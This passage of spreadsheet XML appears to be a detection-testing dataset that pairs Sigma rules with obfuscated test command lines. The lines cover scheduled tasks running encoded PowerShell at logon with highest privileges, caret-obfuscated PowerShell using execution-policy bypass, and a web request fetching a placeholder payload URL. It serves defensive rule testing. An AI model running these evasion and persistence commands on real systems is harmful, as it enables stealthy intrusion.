          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2301" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2301" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2302" ht="15.75" customHeight="1" s="42">
      <c r="A2302" s="43" t="n"/>
      <c r="B2302" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2302" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2302" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2302" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tN "BypassTask" /"TR" "powershell.exe -enc aQBlAHgAZQB..." -"SC" ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F2302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2302" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2302" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J2302" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2302" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2303" ht="15.75" customHeight="1" s="42">
      <c r="A2303" s="43" t="n"/>
      <c r="B2303" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2303" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2303" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2303" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CreATe /TN "BypassTask" /tr "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F2303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2303" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2303" s="4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2303" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2303" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2304" ht="15.75" customHeight="1" s="42">
      <c r="A2304" s="43" t="n"/>
      <c r="B2304" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2304" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2304" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2304" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tn "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F2304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2304" s="44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2304" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2304" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2305" ht="15.75" customHeight="1" s="42">
      <c r="A2305" s="43" t="n"/>
      <c r="B2305" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2305" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2305" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2305" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "BypassTask" -"TR" "powershell.exe -ENcOdEdCOmmANd aQBlAHgAZQB..." /sc ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F2305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2305" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2305" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J2305" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2305" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2306" ht="15.75" customHeight="1" s="42">
      <c r="A2306" s="43" t="n"/>
      <c r="B2306" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2306" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2306" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2306" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tn "BypassTask" -"TR" "powershell.exe -ENCodeDcOMMAND aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F2306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2306" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2306" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J2306" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2306" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2307" ht="15.75" customHeight="1" s="42">
      <c r="A2307" s="43" t="n"/>
      <c r="B2307" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2307" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2307" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2307" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c p^o^w^e^r^s^h^e^l^l.exe -nop -ep bypass -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2307" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2307" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2307" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2307" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2308" ht="15.75" customHeight="1" s="42">
      <c r="A2308" s="43" t="n"/>
      <c r="B2308" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2308" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2308" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2308" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c p^o^w^e^r^s^h^e^l^l.exe -Nop -Ep bypass -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2308" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2308" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2308" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2309" ht="15.75" customHeight="1" s="42">
      <c r="A2309" s="43" t="n"/>
      <c r="B2309" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2309" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2309" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2309" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" p^o^w^e^r^s^h^e^l^l.exe -nop -Ep bypass -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2309" s="43" t="n"/>
      <c r="J2309" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2309" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2310" ht="15.75" customHeight="1" s="42">
      <c r="A2310" s="43" t="n"/>
      <c r="B2310" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2310" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2310" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2310" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c p^o^w^e^r^s^h^e^l^l.exe -nop -eP bypass -C "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2310" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2310" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2310" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2311" ht="15.75" customHeight="1" s="42">
      <c r="A2311" s="43" t="n"/>
      <c r="B2311" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2311" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2311" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2311" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" p^o^w^e^r^s^h^e^l^l.exe /"nop" -"ep" bypass -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2311" s="44" t="n"/>
      <c r="J2311" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2311" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2312" ht="15.75" customHeight="1" s="42">
      <c r="A2312" s="43" t="n"/>
      <c r="B2312" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2312" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2312" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2312" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" p^o^w^e^r^s^h^e^l^l.exe -nop -ep bypass -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2312" s="44" t="n"/>
      <c r="J2312" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2312" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2313" ht="15.75" customHeight="1" s="42">
      <c r="A2313" s="43" t="n"/>
      <c r="B2313" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2313" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2313" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2313" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c p^o^w^e^r^s^h^e^l^l.exe -noP -ep bypass -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2313" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2313" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2313" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2313" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2314" ht="15.75" customHeight="1" s="42">
      <c r="A2314" s="43" t="n"/>
      <c r="B2314" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2314" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2314" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2314" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c p^o^w^e^r^s^h^e^l^l.exe -Nop -ep bypass -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2314" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2314" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2314" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2314" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2315" ht="15.75" customHeight="1" s="42">
      <c r="A2315" s="43" t="n"/>
      <c r="B2315" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2315" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2315" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2315" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nop -ep bypass -c "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F2315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2315" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2315" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2315" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2315" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2316" ht="15.75" customHeight="1" s="42">
      <c r="A2316" s="43" t="n"/>
      <c r="B2316" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2316" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2316" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2316" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nOP -ep bypass -c "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F2316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2316" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2316" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2316" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2316" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2317" ht="15.75" customHeight="1" s="42">
      <c r="A2317" s="43" t="n"/>
      <c r="B2317" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2317" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2317" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2317" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" powershell.exe -nop -ep bypass -C "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F2317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2317" s="43" t="n"/>
      <c r="J2317" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2317" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2318" ht="15.75" customHeight="1" s="42">
      <c r="A2318" s="43" t="n"/>
      <c r="B2318" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2318" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2318" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2318" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" powershell.exe -nop -Ep bypass /"c" "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F2318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2318" s="43" t="n"/>
      <c r="J2318" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2318" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2319" ht="15.75" customHeight="1" s="42">
      <c r="A2319" s="43" t="n"/>
      <c r="B2319" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2319" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2319" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2319" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" pwsh.exe -nop -c "Write-Host 'Bypass'" -f payload.lnk</t>
        </is>
      </c>
      <c r="F2319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2319" s="43" t="n"/>
      <c r="J2319" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2319" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2320" ht="15.75" customHeight="1" s="42">
      <c r="A2320" s="43" t="n"/>
      <c r="B2320" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2320" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2320" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2320" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" pwsh.exe -nOp -c "Write-Host 'Bypass'" -"f" payload.lnk</t>
        </is>
      </c>
      <c r="F2320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2320" s="43" t="n"/>
      <c r="J2320" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2320" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2321" ht="15.75" customHeight="1" s="42">
      <c r="A2321" s="43" t="n"/>
      <c r="B2321" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2321" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2321" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2321" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" pwsh.exe -nOp -"c" "Write-Host 'Bypass'" -f payload.lnk</t>
        </is>
      </c>
      <c r="F2321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2321" s="43" t="n"/>
      <c r="J2321" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2321" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2322" ht="15.75" customHeight="1" s="42">
      <c r="A2322" s="43" t="n"/>
      <c r="B2322" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2322" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2322" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2322" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -ep bypass -c "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F2322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2322" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2322" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2322" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2322" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2323" ht="15.75" customHeight="1" s="42">
      <c r="A2323" s="43" t="n"/>
      <c r="B2323" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C2323" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D2323" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E2323" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy bypass -Command "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F2323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2323" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2323" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2323" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2323" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2324" ht="15.75" customHeight="1" s="42">
      <c r="A2324" s="44" t="n"/>
      <c r="B2324" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2324" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2324" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2324" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F2324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2324" s="44" t="n"/>
      <c r="J2324" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2324" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2325" ht="15.75" customHeight="1" s="42">
      <c r="A2325" s="44" t="n"/>
      <c r="B2325" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2325" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2325" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2325" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnD "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F2325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2325" s="44" t="n"/>
      <c r="J2325" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2325" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2326" ht="15.75" customHeight="1" s="42">
      <c r="A2326" s="44" t="n"/>
      <c r="B2326" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C2326" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D2326" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E2326" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F2326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2326" s="44" t="n"/>
      <c r="J2326" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2326" s="44" t="b">
        <v>0</v>
      </c>
    </row>
